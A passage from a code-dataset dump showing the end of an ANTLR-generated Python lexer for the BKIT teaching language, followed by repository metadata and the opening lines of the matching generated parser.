buf.write(\"\\u00b8\\3\\2\\2\\2\\u00ba\\u00bb\\3\\2\\2\\2\\u00bb\\u00bd\\3\\2\\2\\2\")\n buf.write(\"\\u00bc\\u00ba\\3\\2\\2\\2\\u00bd\\u00be\\5#\\22\\2\\u00be\\b\\3\\2\\2\")\n buf.write(\"\\2\\u00bf\\u00c3\\7$\\2\\2\\u00c0\\u00c2\\5)\\25\\2\\u00c1\\u00c0\")\n buf.write(\"\\3\\2\\2\\2\\u00c2\\u00c5\\3\\2\\2\\2\\u00c3\\u00c1\\3\\2\\2\\2\\u00c3\")\n 
buf.write(\"\\u00c4\\3\\2\\2\\2\\u00c4\\u00c7\\3\\2\\2\\2\\u00c5\\u00c3\\3\\2\\2\\2\")\n buf.write(\"\\u00c6\\u00c8\\t\\2\\2\\2\\u00c7\\u00c6\\3\\2\\2\\2\\u00c8\\n\\3\\2\\2\")\n buf.write(\"\\2\\u00c9\\u00ca\\7,\\2\\2\\u00ca\\u00cb\\7,\\2\\2\\u00cb\\u00cf\\3\")\n buf.write(\"\\2\\2\\2\\u00cc\\u00ce\\13\\2\\2\\2\\u00cd\\u00cc\\3\\2\\2\\2\\u00ce\")\n buf.write(\"\\u00d1\\3\\2\\2\\2\\u00cf\\u00d0\\3\\2\\2\\2\\u00cf\\u00cd\\3\\2\\2\\2\")\n buf.write(\"\\u00d0\\u00d2\\3\\2\\2\\2\\u00d1\\u00cf\\3\\2\\2\\2\\u00d2\\u00d3\\7\")\n buf.write(\",\\2\\2\\u00d3\\u00d4\\7,\\2\\2\\u00d4\\u00d5\\3\\2\\2\\2\\u00d5\\u00d6\")\n buf.write(\"\\b\\6\\2\\2\\u00d6\\f\\3\\2\\2\\2\\u00d7\\u00d8\\7,\\2\\2\\u00d8\\u00d9\")\n buf.write(\"\\7,\\2\\2\\u00d9\\u00dd\\3\\2\\2\\2\\u00da\\u00dc\\13\\2\\2\\2\\u00db\")\n buf.write(\"\\u00da\\3\\2\\2\\2\\u00dc\\u00df\\3\\2\\2\\2\\u00dd\\u00de\\3\\2\\2\\2\")\n buf.write(\"\\u00dd\\u00db\\3\\2\\2\\2\\u00de\\u00e0\\3\\2\\2\\2\\u00df\\u00dd\\3\")\n buf.write(\"\\2\\2\\2\\u00e0\\u00e1\\7\\2\\2\\3\\u00e1\\16\\3\\2\\2\\2\\u00e2\\u00e3\")\n buf.write(\"\\t\\3\\2\\2\\u00e3\\20\\3\\2\\2\\2\\u00e4\\u00e6\\t\\4\\2\\2\\u00e5\\u00e4\")\n buf.write(\"\\3\\2\\2\\2\\u00e6\\u00e7\\3\\2\\2\\2\\u00e7\\u00e5\\3\\2\\2\\2\\u00e7\")\n buf.write(\"\\u00e8\\3\\2\\2\\2\\u00e8\\u00e9\\3\\2\\2\\2\\u00e9\\u00ea\\b\\t\\2\\2\")\n buf.write(\"\\u00ea\\22\\3\\2\\2\\2\\u00eb\\u00ec\\t\\5\\2\\2\\u00ec\\24\\3\\2\\2\\2\")\n buf.write(\"\\u00ed\\u00ee\\t\\6\\2\\2\\u00ee\\26\\3\\2\\2\\2\\u00ef\\u00f0\\t\\7\")\n buf.write(\"\\2\\2\\u00f0\\30\\3\\2\\2\\2\\u00f1\\u00f4\\5\\23\\n\\2\\u00f2\\u00f4\")\n buf.write(\"\\5\\25\\13\\2\\u00f3\\u00f1\\3\\2\\2\\2\\u00f3\\u00f2\\3\\2\\2\\2\\u00f4\")\n buf.write(\"\\32\\3\\2\\2\\2\\u00f5\\u00f7\\t\\b\\2\\2\\u00f6\\u00f5\\3\\2\\2\\2\\u00f6\")\n buf.write(\"\\u00f7\\3\\2\\2\\2\\u00f7\\34\\3\\2\\2\\2\\u00f8\\u00f9\\t\\t\\2\\2\\u00f9\")\n buf.write(\"\\u00fb\\5\\33\\16\\2\\u00fa\\u00fc\\5\\27\\f\\2\\u00fb\\u00fa\\3\\2\")\n 
buf.write(\"\\2\\2\\u00fc\\u00fd\\3\\2\\2\\2\\u00fd\\u00fb\\3\\2\\2\\2\\u00fd\\u00fe\")\n buf.write(\"\\3\\2\\2\\2\\u00fe\\36\\3\\2\\2\\2\\u00ff\\u0103\\t\\n\\2\\2\\u0100\\u0102\")\n buf.write(\"\\5\\27\\f\\2\\u0101\\u0100\\3\\2\\2\\2\\u0102\\u0105\\3\\2\\2\\2\\u0103\")\n buf.write(\"\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\\2\\2\\2\\u0104 \\3\\2\\2\\2\\u0105\")\n buf.write(\"\\u0103\\3\\2\\2\\2\\u0106\\u0108\\5\\27\\f\\2\\u0107\\u0106\\3\\2\\2\")\n buf.write(\"\\2\\u0108\\u0109\\3\\2\\2\\2\\u0109\\u0107\\3\\2\\2\\2\\u0109\\u010a\")\n buf.write(\"\\3\\2\\2\\2\\u010a\\u0110\\3\\2\\2\\2\\u010b\\u010d\\5\\37\\20\\2\\u010c\")\n buf.write(\"\\u010e\\5\\35\\17\\2\\u010d\\u010c\\3\\2\\2\\2\\u010d\\u010e\\3\\2\\2\")\n buf.write(\"\\2\\u010e\\u0111\\3\\2\\2\\2\\u010f\\u0111\\5\\35\\17\\2\\u0110\\u010b\")\n buf.write(\"\\3\\2\\2\\2\\u0110\\u010f\\3\\2\\2\\2\\u0111\\\"\\3\\2\\2\\2\\u0112\\u0113\")\n buf.write(\"\\7^\\2\\2\\u0113\\u0114\\n\\13\\2\\2\\u0114$\\3\\2\\2\\2\\u0115\\u0116\")\n buf.write(\"\\7^\\2\\2\\u0116\\u0117\\t\\13\\2\\2\\u0117&\\3\\2\\2\\2\\u0118\\u0119\")\n buf.write(\"\\7)\\2\\2\\u0119\\u011a\\7$\\2\\2\\u011a(\\3\\2\\2\\2\\u011b\\u011f\")\n buf.write(\"\\n\\f\\2\\2\\u011c\\u011f\\5%\\23\\2\\u011d\\u011f\\5\\'\\24\\2\\u011e\")\n buf.write(\"\\u011b\\3\\2\\2\\2\\u011e\\u011c\\3\\2\\2\\2\\u011e\\u011d\\3\\2\\2\\2\")\n buf.write(\"\\u011f*\\3\\2\\2\\2\\u0120\\u0121\\t\\r\\2\\2\\u0121,\\3\\2\\2\\2\\u0122\")\n buf.write(\"\\u0123\\t\\16\\2\\2\\u0123.\\3\\2\\2\\2\\u0124\\u0125\\7\\62\\2\\2\\u0125\")\n buf.write(\"\\u0129\\7z\\2\\2\\u0126\\u0127\\7\\62\\2\\2\\u0127\\u0129\\7Z\\2\\2\")\n buf.write(\"\\u0128\\u0124\\3\\2\\2\\2\\u0128\\u0126\\3\\2\\2\\2\\u0129\\u012b\\3\")\n buf.write(\"\\2\\2\\2\\u012a\\u012c\\5+\\26\\2\\u012b\\u012a\\3\\2\\2\\2\\u012c\\u012d\")\n buf.write(\"\\3\\2\\2\\2\\u012d\\u012b\\3\\2\\2\\2\\u012d\\u012e\\3\\2\\2\\2\\u012e\")\n buf.write(\"\\60\\3\\2\\2\\2\\u012f\\u0131\\5\\27\\f\\2\\u0130\\u012f\\3\\2\\2\\2\\u0131\")\n 
buf.write(\"\\u0132\\3\\2\\2\\2\\u0132\\u0130\\3\\2\\2\\2\\u0132\\u0133\\3\\2\\2\\2\")\n buf.write(\"\\u0133\\62\\3\\2\\2\\2\\u0134\\u0135\\7\\62\\2\\2\\u0135\\u0139\\7q\")\n buf.write(\"\\2\\2\\u0136\\u0137\\7\\62\\2\\2\\u0137\\u0139\\7Q\\2\\2\\u0138\\u0134\")\n buf.write(\"\\3\\2\\2\\2\\u0138\\u0136\\3\\2\\2\\2\\u0139\\u013b\\3\\2\\2\\2\\u013a\")\n buf.write(\"\\u013c\\5-\\27\\2\\u013b\\u013a\\3\\2\\2\\2\\u013c\\u013d\\3\\2\\2\\2\")\n buf.write(\"\\u013d\\u013b\\3\\2\\2\\2\\u013d\\u013e\\3\\2\\2\\2\\u013e\\64\\3\\2\")\n buf.write(\"\\2\\2\\u013f\\u0144\\5\\67\\34\\2\\u0140\\u0144\\59\\35\\2\\u0141\\u0144\")\n buf.write(\"\\5;\\36\\2\\u0142\\u0144\\5=\\37\\2\\u0143\\u013f\\3\\2\\2\\2\\u0143\")\n buf.write(\"\\u0140\\3\\2\\2\\2\\u0143\\u0141\\3\\2\\2\\2\\u0143\\u0142\\3\\2\\2\\2\")\n buf.write(\"\\u0144\\66\\3\\2\\2\\2\\u0145\\u0149\\5\\61\\31\\2\\u0146\\u0149\\5\")\n buf.write(\"/\\30\\2\\u0147\\u0149\\5\\63\\32\\2\\u0148\\u0145\\3\\2\\2\\2\\u0148\")\n buf.write(\"\\u0146\\3\\2\\2\\2\\u0148\\u0147\\3\\2\\2\\2\\u01498\\3\\2\\2\\2\\u014a\")\n buf.write(\"\\u014b\\5!\\21\\2\\u014b:\\3\\2\\2\\2\\u014c\\u014f\\5c\\62\\2\\u014d\")\n buf.write(\"\\u014f\\5e\\63\\2\\u014e\\u014c\\3\\2\\2\\2\\u014e\\u014d\\3\\2\\2\\2\")\n buf.write(\"\\u014f<\\3\\2\\2\\2\\u0150\\u0154\\7$\\2\\2\\u0151\\u0153\\5)\\25\\2\")\n buf.write(\"\\u0152\\u0151\\3\\2\\2\\2\\u0153\\u0156\\3\\2\\2\\2\\u0154\\u0152\\3\")\n buf.write(\"\\2\\2\\2\\u0154\\u0155\\3\\2\\2\\2\\u0155\\u0157\\3\\2\\2\\2\\u0156\\u0154\")\n buf.write(\"\\3\\2\\2\\2\\u0157\\u0158\\7$\\2\\2\\u0158\\u0159\\b\\37\\3\\2\\u0159\")\n buf.write(\">\\3\\2\\2\\2\\u015a\\u015b\\7D\\2\\2\\u015b\\u015c\\7q\\2\\2\\u015c\")\n buf.write(\"\\u015d\\7f\\2\\2\\u015d\\u015e\\7{\\2\\2\\u015e@\\3\\2\\2\\2\\u015f\")\n buf.write(\"\\u0160\\7D\\2\\2\\u0160\\u0161\\7t\\2\\2\\u0161\\u0162\\7g\\2\\2\\u0162\")\n buf.write(\"\\u0163\\7c\\2\\2\\u0163\\u0164\\7m\\2\\2\\u0164B\\3\\2\\2\\2\\u0165\")\n 
buf.write(\"\\u0166\\7E\\2\\2\\u0166\\u0167\\7q\\2\\2\\u0167\\u0168\\7p\\2\\2\\u0168\")\n buf.write(\"\\u0169\\7v\\2\\2\\u0169\\u016a\\7k\\2\\2\\u016a\\u016b\\7p\\2\\2\\u016b\")\n buf.write(\"\\u016c\\7w\\2\\2\\u016c\\u016d\\7g\\2\\2\\u016dD\\3\\2\\2\\2\\u016e\")\n buf.write(\"\\u016f\\7F\\2\\2\\u016f\\u0170\\7q\\2\\2\\u0170F\\3\\2\\2\\2\\u0171\")\n buf.write(\"\\u0172\\7G\\2\\2\\u0172\\u0173\\7n\\2\\2\\u0173\\u0174\\7u\\2\\2\\u0174\")\n buf.write(\"\\u0175\\7g\\2\\2\\u0175H\\3\\2\\2\\2\\u0176\\u0177\\7G\\2\\2\\u0177\")\n buf.write(\"\\u0178\\7n\\2\\2\\u0178\\u0179\\7U\\2\\2\\u0179\\u017a\\7g\\2\\2\\u017a\")\n buf.write(\"\\u017b\\7n\\2\\2\\u017b\\u017c\\7h\\2\\2\\u017cJ\\3\\2\\2\\2\\u017d\")\n buf.write(\"\\u017e\\7G\\2\\2\\u017e\\u017f\\7n\\2\\2\\u017f\\u0180\\7u\\2\\2\\u0180\")\n buf.write(\"\\u0181\\7g\\2\\2\\u0181\\u0182\\7K\\2\\2\\u0182\\u0183\\7h\\2\\2\\u0183\")\n buf.write(\"L\\3\\2\\2\\2\\u0184\\u0185\\7G\\2\\2\\u0185\\u0186\\7p\\2\\2\\u0186\")\n buf.write(\"\\u0187\\7f\\2\\2\\u0187\\u0188\\7K\\2\\2\\u0188\\u0189\\7h\\2\\2\\u0189\")\n buf.write(\"N\\3\\2\\2\\2\\u018a\\u018b\\7G\\2\\2\\u018b\\u018c\\7p\\2\\2\\u018c\")\n buf.write(\"\\u018d\\7f\\2\\2\\u018d\\u018e\\7H\\2\\2\\u018e\\u018f\\7q\\2\\2\\u018f\")\n buf.write(\"\\u0190\\7t\\2\\2\\u0190P\\3\\2\\2\\2\\u0191\\u0192\\7G\\2\\2\\u0192\")\n buf.write(\"\\u0193\\7p\\2\\2\\u0193\\u0194\\7f\\2\\2\\u0194\\u0195\\7Y\\2\\2\\u0195\")\n buf.write(\"\\u0196\\7j\\2\\2\\u0196\\u0197\\7k\\2\\2\\u0197\\u0198\\7n\\2\\2\\u0198\")\n buf.write(\"\\u0199\\7g\\2\\2\\u0199R\\3\\2\\2\\2\\u019a\\u019b\\7H\\2\\2\\u019b\")\n buf.write(\"\\u019c\\7q\\2\\2\\u019c\\u019d\\7t\\2\\2\\u019dT\\3\\2\\2\\2\\u019e\")\n buf.write(\"\\u019f\\7H\\2\\2\\u019f\\u01a0\\7w\\2\\2\\u01a0\\u01a1\\7p\\2\\2\\u01a1\")\n buf.write(\"\\u01a2\\7e\\2\\2\\u01a2\\u01a3\\7v\\2\\2\\u01a3\\u01a4\\7k\\2\\2\\u01a4\")\n buf.write(\"\\u01a5\\7q\\2\\2\\u01a5\\u01a6\\7p\\2\\2\\u01a6V\\3\\2\\2\\2\\u01a7\")\n 
buf.write(\"\\u01a8\\7K\\2\\2\\u01a8\\u01a9\\7h\\2\\2\\u01a9X\\3\\2\\2\\2\\u01aa\")\n buf.write(\"\\u01ab\\7R\\2\\2\\u01ab\\u01ac\\7c\\2\\2\\u01ac\\u01ad\\7t\\2\\2\\u01ad\")\n buf.write(\"\\u01ae\\7c\\2\\2\\u01ae\\u01af\\7o\\2\\2\\u01af\\u01b0\\7g\\2\\2\\u01b0\")\n buf.write(\"\\u01b1\\7v\\2\\2\\u01b1\\u01b2\\7g\\2\\2\\u01b2\\u01b3\\7t\\2\\2\\u01b3\")\n buf.write(\"Z\\3\\2\\2\\2\\u01b4\\u01b5\\7T\\2\\2\\u01b5\\u01b6\\7g\\2\\2\\u01b6\")\n buf.write(\"\\u01b7\\7v\\2\\2\\u01b7\\u01b8\\7w\\2\\2\\u01b8\\u01b9\\7t\\2\\2\\u01b9\")\n buf.write(\"\\u01ba\\7p\\2\\2\\u01ba\\\\\\3\\2\\2\\2\\u01bb\\u01bc\\7V\\2\\2\\u01bc\")\n buf.write(\"\\u01bd\\7j\\2\\2\\u01bd\\u01be\\7g\\2\\2\\u01be\\u01bf\\7p\\2\\2\\u01bf\")\n buf.write(\"^\\3\\2\\2\\2\\u01c0\\u01c1\\7X\\2\\2\\u01c1\\u01c2\\7c\\2\\2\\u01c2\")\n buf.write(\"\\u01c3\\7t\\2\\2\\u01c3`\\3\\2\\2\\2\\u01c4\\u01c5\\7Y\\2\\2\\u01c5\")\n buf.write(\"\\u01c6\\7j\\2\\2\\u01c6\\u01c7\\7k\\2\\2\\u01c7\\u01c8\\7n\\2\\2\\u01c8\")\n buf.write(\"\\u01c9\\7g\\2\\2\\u01c9b\\3\\2\\2\\2\\u01ca\\u01cb\\7V\\2\\2\\u01cb\")\n buf.write(\"\\u01cc\\7t\\2\\2\\u01cc\\u01cd\\7w\\2\\2\\u01cd\\u01ce\\7g\\2\\2\\u01ce\")\n buf.write(\"d\\3\\2\\2\\2\\u01cf\\u01d0\\7H\\2\\2\\u01d0\\u01d1\\7c\\2\\2\\u01d1\")\n buf.write(\"\\u01d2\\7n\\2\\2\\u01d2\\u01d3\\7u\\2\\2\\u01d3\\u01d4\\7g\\2\\2\\u01d4\")\n buf.write(\"f\\3\\2\\2\\2\\u01d5\\u01d6\\7G\\2\\2\\u01d6\\u01d7\\7p\\2\\2\\u01d7\")\n buf.write(\"\\u01d8\\7f\\2\\2\\u01d8\\u01d9\\7F\\2\\2\\u01d9\\u01da\\7q\\2\\2\\u01da\")\n buf.write(\"h\\3\\2\\2\\2\\u01db\\u01dc\\7-\\2\\2\\u01dcj\\3\\2\\2\\2\\u01dd\\u01de\")\n buf.write(\"\\7-\\2\\2\\u01de\\u01df\\7\\60\\2\\2\\u01dfl\\3\\2\\2\\2\\u01e0\\u01e1\")\n buf.write(\"\\7/\\2\\2\\u01e1n\\3\\2\\2\\2\\u01e2\\u01e3\\7/\\2\\2\\u01e3\\u01e4\")\n buf.write(\"\\7\\60\\2\\2\\u01e4p\\3\\2\\2\\2\\u01e5\\u01e6\\7,\\2\\2\\u01e6r\\3\\2\")\n buf.write(\"\\2\\2\\u01e7\\u01e8\\7,\\2\\2\\u01e8\\u01e9\\7\\60\\2\\2\\u01e9t\\3\")\n 
buf.write(\"\\2\\2\\2\\u01ea\\u01eb\\7^\\2\\2\\u01ebv\\3\\2\\2\\2\\u01ec\\u01ed\\7\")\n buf.write(\"^\\2\\2\\u01ed\\u01ee\\7\\60\\2\\2\\u01eex\\3\\2\\2\\2\\u01ef\\u01f0\")\n buf.write(\"\\7\\'\\2\\2\\u01f0z\\3\\2\\2\\2\\u01f1\\u01f2\\7#\\2\\2\\u01f2|\\3\\2\")\n buf.write(\"\\2\\2\\u01f3\\u01f4\\7(\\2\\2\\u01f4\\u01f5\\7(\\2\\2\\u01f5~\\3\\2\")\n buf.write(\"\\2\\2\\u01f6\\u01f7\\7~\\2\\2\\u01f7\\u01f8\\7~\\2\\2\\u01f8\\u0080\")\n buf.write(\"\\3\\2\\2\\2\\u01f9\\u01fa\\7?\\2\\2\\u01fa\\u01fb\\7?\\2\\2\\u01fb\\u0082\")\n buf.write(\"\\3\\2\\2\\2\\u01fc\\u01fd\\7#\\2\\2\\u01fd\\u01fe\\7?\\2\\2\\u01fe\\u0084\")\n buf.write(\"\\3\\2\\2\\2\\u01ff\\u0200\\7>\\2\\2\\u0200\\u0086\\3\\2\\2\\2\\u0201\")\n buf.write(\"\\u0202\\7@\\2\\2\\u0202\\u0088\\3\\2\\2\\2\\u0203\\u0204\\7>\\2\\2\\u0204\")\n buf.write(\"\\u0205\\7?\\2\\2\\u0205\\u008a\\3\\2\\2\\2\\u0206\\u0207\\7@\\2\\2\\u0207\")\n buf.write(\"\\u0208\\7?\\2\\2\\u0208\\u008c\\3\\2\\2\\2\\u0209\\u020a\\7?\\2\\2\\u020a\")\n buf.write(\"\\u020b\\7^\\2\\2\\u020b\\u020c\\7?\\2\\2\\u020c\\u008e\\3\\2\\2\\2\\u020d\")\n buf.write(\"\\u020e\\7>\\2\\2\\u020e\\u020f\\7\\60\\2\\2\\u020f\\u0090\\3\\2\\2\\2\")\n buf.write(\"\\u0210\\u0211\\7@\\2\\2\\u0211\\u0212\\7\\60\\2\\2\\u0212\\u0092\\3\")\n buf.write(\"\\2\\2\\2\\u0213\\u0214\\7>\\2\\2\\u0214\\u0215\\7?\\2\\2\\u0215\\u0216\")\n buf.write(\"\\7\\60\\2\\2\\u0216\\u0094\\3\\2\\2\\2\\u0217\\u0218\\7@\\2\\2\\u0218\")\n buf.write(\"\\u0219\\7?\\2\\2\\u0219\\u021a\\7\\60\\2\\2\\u021a\\u0096\\3\\2\\2\\2\")\n buf.write(\"\\u021b\\u021c\\7*\\2\\2\\u021c\\u0098\\3\\2\\2\\2\\u021d\\u021e\\7\")\n buf.write(\"+\\2\\2\\u021e\\u009a\\3\\2\\2\\2\\u021f\\u0220\\7]\\2\\2\\u0220\\u009c\")\n buf.write(\"\\3\\2\\2\\2\\u0221\\u0222\\7_\\2\\2\\u0222\\u009e\\3\\2\\2\\2\\u0223\")\n buf.write(\"\\u0224\\7}\\2\\2\\u0224\\u00a0\\3\\2\\2\\2\\u0225\\u0226\\7\\177\\2\")\n buf.write(\"\\2\\u0226\\u00a2\\3\\2\\2\\2\\u0227\\u0228\\7<\\2\\2\\u0228\\u00a4\")\n 
buf.write(\"\\3\\2\\2\\2\\u0229\\u022a\\7\\60\\2\\2\\u022a\\u00a6\\3\\2\\2\\2\\u022b\")\n buf.write(\"\\u022c\\7=\\2\\2\\u022c\\u00a8\\3\\2\\2\\2\\u022d\\u022e\\7.\\2\\2\\u022e\")\n buf.write(\"\\u00aa\\3\\2\\2\\2\\34\\2\\u00b1\\u00b3\\u00ba\\u00c3\\u00c7\\u00cf\")\n buf.write(\"\\u00dd\\u00e7\\u00f3\\u00f6\\u00fd\\u0103\\u0109\\u010d\\u0110\")\n buf.write(\"\\u011e\\u0128\\u012d\\u0132\\u0138\\u013d\\u0143\\u0148\\u014e\")\n buf.write(\"\\u0154\\4\\b\\2\\2\\3\\37\\2\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n REAL_NUMBER = 1\n ID = 2\n ILLEGAL_ESCAPE = 3\n UNCLOSE_STRING = 4\n COMMENT = 5\n UNTERMINATED_COMMENT = 6\n ERROR_CHAR = 7\n WS = 8\n Literal = 9\n Integer_literal = 10\n Float_literal = 11\n Boolean_literal = 12\n String_literal = 13\n BODY = 14\n BREAK = 15\n CONTINUE = 16\n DO = 17\n ELSE = 18\n ELSELF = 19\n ELSEIF = 20\n ENDBODY = 21\n ENDFOR = 22\n ENDWHILE = 23\n FOR = 24\n FUNCTION = 25\n IF = 26\n PARAMETER = 27\n RETURN = 28\n THEN = 29\n VAR = 30\n WHILE = 31\n TRUE = 32\n FALSE = 33\n ENDDO = 34\n PLUS_INT = 35\n PLUS_FLOAT = 36\n MINUS_INT = 37\n MINUS_FLOAT = 38\n STAR_INT = 39\n STAR_FLOAT = 40\n DIV_INT = 41\n DIV_FLOAT = 42\n MOD = 43\n NOT = 44\n AND = 45\n OR = 46\n EQUAL = 47\n NOT_EQUAL_INT = 48\n LESS_INT = 49\n GREATER_INT = 50\n LESS_OR_EQUAL_INT = 51\n GREATER_OR_EQUAL_INT = 52\n NOT_EQUAL_FLOAT = 53\n LESS_FLOAT = 54\n GREATER_FLOAT = 55\n LESS_OR_EQUAL_FLOAT = 56\n GREATER_OR_EQUAL_FLOAT = 57\n LEFT_PAREN = 58\n RIGHT_PARENT = 59\n LEFT_BRACKET = 60\n RIGHT_BRACKET = 61\n LEFT_BRACE = 62\n RIGHT_BRACE = 63\n COLON = 64\n DOT = 65\n SEMI = 66\n COMMA = 67\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElSelf'\", \n 
\"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n \"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \n \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=\\\\='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \n \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \"Literal\", \"Integer_literal\", \n \"Float_literal\", \"Boolean_literal\", \"String_literal\", \"BODY\", \n \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\" ]\n\n ruleNames = [ \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \n \"COMMENT\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \n \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \"LETTER\", \n \"SIGN\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n \"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \n \"STRING_CHAR\", 
\"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"Literal\", \"Integer_literal\", \"Float_literal\", \n \"Boolean_literal\", \"String_literal\", \"BODY\", \"BREAK\", \n \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \n \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \n \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \n \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \n \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \"RIGHT_PARENT\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[29] = self.String_literal_action \n self._actions = actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + 
str(ruleIndex))\n\n\n def String_literal_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n print(\"what the fuck: \", self.text)\n y = str(self.text)\n self.text = y[1:-1]\n \n \n\n\n" }, { "alpha_fraction": 0.49111613631248474, "alphanum_fraction": 0.5538291931152344, "avg_line_length": 33.306148529052734, "blob_id": "3438cf45f827e1de72956edd49fa36c27cd9ae1d", "content_id": "ce6d7cab072cf7506f8648048464646011a91fa1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102658, "license_type": "no_license", "max_line_length": 455, "num_lines": 2992, "path": "/Assignments/assignment1/src/forJava/.antlr/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/Assignments/assignment1/src/forJava/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3M\")\n buf.write(\"\\u01a0\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\\t\\23\")\n buf.write(\"\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\")\n buf.write(\"\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\")\n 